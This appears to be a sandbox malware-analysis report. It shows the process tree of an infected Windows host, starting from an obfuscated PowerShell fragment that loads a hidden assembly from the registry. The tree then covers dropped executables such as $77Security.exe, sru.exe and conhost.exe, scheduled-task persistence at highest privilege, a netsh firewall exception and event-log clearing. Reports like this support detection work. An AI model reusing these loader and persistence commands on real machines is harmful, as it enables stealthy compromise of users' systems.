XxgADZxVsniWQAc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WLjfyPlDfzVZbpOpw,$CiZGXADugUxJZaEEkTgvJO).Invoke($SVXxgADZxVsniWQAc,[uint32]8,0x20,[ref]$giLXTHeGsW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3712
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4012
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  - Executes dropped EXE
  PID:5028
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  - Executes dropped EXE
  PID:920
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  - Executes dropped EXE
  PID:3168
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  PID:2752
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  PID:1372
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  PID:1620
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  PID:772
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  PID:732
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  PID:2256
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  PID:2492
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  PID:2856
- C:\Users\Admin\AppData\Roaming\$77Security.exe
  C:\Users\Admin\AppData\Roaming\$77Security.exe
  2⤵
  PID:3428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1296

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1384

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1476
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2072

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Drops file in System32 directory
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2716

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2808

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3124

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3184
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1456
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2108
- - C:\Users\Admin\AppData\Local\Temp\Files\Security.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Security.exe"
    3⤵
    - Executes dropped EXE
    PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\$77Security.exe
      "C:\Users\Admin\AppData\Local\Temp\$77Security.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      PID:2980
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Security" /tr "C:\Users\Admin\AppData\Roaming\$77Security.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4768
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4896
  - - C:\Users\Admin\AppData\Local\Temp\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3140
- - C:\Users\Admin\AppData\Local\Temp\Files\client.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4596
- - C:\Users\Admin\AppData\Local\Temp\Files\444.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\444.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2480
  - - C:\Users\Admin\AppData\Roaming\conhost.exe
      "C:\Users\Admin\AppData\Roaming\conhost.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Drops autorun.inf file
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      PID:2088
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4716
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5012
- - C:\Users\Admin\AppData\Local\Temp\Files\cli.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\cli.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1860
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2800
- - C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
    3⤵
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    PID:3172
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2456
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3580
  - - C:\Windows\system32\sru\sru.exe
      "C:\Windows\system32\sru\sru.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      PID:1412
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1860
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4484
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c0wBGCt6qNZu.bat" "
        5⤵
        
        PID:2960
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3116
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:3692
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4688
      - C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        6⤵
        Executes dropped EXE
        
        PID:704
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4072
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JL1UoujlVVh8.bat" "
        7⤵
        
        PID:4796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3240
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:3224
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5028
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        8⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:4200
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2848
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NbAtU5luXqvl.bat" "
        9⤵
        
        PID:4012
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:4896
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:1840
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        
        PID:3240
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        10⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:4200
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2636
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:3044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BBcQKUfTp1NP.bat" "
        11⤵
        
        PID:5092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:1768
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:2180
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1472
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        12⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:3240
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        13⤵
        
        PID:3148
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:3520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gZJ6kL94NpFh.bat" "
        13⤵
        
        PID:4636
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:4992
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:480
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        
        PID:1012
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        14⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2216
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1536
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B1sCmfX7kSOO.bat" "
        15⤵
        
        PID:1880
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:4708
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:2624
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        
        PID:1824
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        16⤵
        Executes dropped EXE
        
        PID:1860
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:3400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RczRhUkZ4cIP.bat" "
        17⤵
        
        PID:1056
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:4988
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:3052
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3984
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        18⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:3968
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        19⤵
        
        PID:4548
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:3580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9emGgeU4waqd.bat" "
        19⤵
        
        PID:4940
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:3208
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:412
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        Runs ping.exe
        
        PID:1968
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        20⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:3700
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fPfbkU7wezBz.bat" "
        21⤵
        
        PID:1020
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:1860
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:3444
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3228
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        22⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:3804
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vI3WbjpLEbKv.bat" "
        23⤵
        
        PID:248
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:4216
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:1060
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        Runs ping.exe
        
        PID:2584
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        24⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2112
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        25⤵
        
        PID:2572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:3924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l7dTiwuu5vYO.bat" "
        25⤵
        
        PID:2032
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:1492
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:3452
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4536
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        26⤵
        Executes dropped EXE
        
        PID:772
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:4792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rtIP4TBV9Trf.bat" "
        27⤵
        
        PID:2896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:4224
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:2632
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1064
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        28⤵
        Executes dropped EXE
        
        PID:4048
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        29⤵
        
        PID:200
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:2216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wU6p0ecGlGDg.bat" "
        29⤵
        
        PID:788
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:2152
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:4852
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5012
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        30⤵
        Executes dropped EXE
        
        PID:2872
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        31⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1884
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        
        PID:2260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BJl6Et0pMmcg.bat" "
        31⤵
        
        PID:756
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        
        PID:588
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        32⤵
        
        PID:3044
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        32⤵
        
        PID:920
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        32⤵
        Executes dropped EXE
        
        PID:4720
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        33⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9aDDqLJMjWlE.bat" "
        33⤵
        
        PID:2624
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:3780
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        34⤵
        
        PID:2876
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        34⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:872
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        34⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:1464
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        35⤵
        
        PID:1064
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        
        PID:1488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aElWQqetGAyr.bat" "
        35⤵
        
        PID:2232
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        
        PID:3240
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        36⤵
        
        PID:3056
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        36⤵
        Runs ping.exe
        
        PID:4024
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        36⤵
        Executes dropped EXE
        
        PID:4808
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        37⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nX5dcyJI6NmV.bat" "
        37⤵
        
        PID:588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:1584
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        38⤵
        
        PID:3472
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        38⤵
        Runs ping.exe
        
        PID:1052
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        38⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:3384
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        39⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        40⤵
        
        PID:1020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSHbW19dpPKn.bat" "
        39⤵
        
        PID:2872
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        40⤵
        
        PID:3200
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        40⤵
        
        PID:956
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        40⤵
        
        PID:2932
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        40⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:1880
        
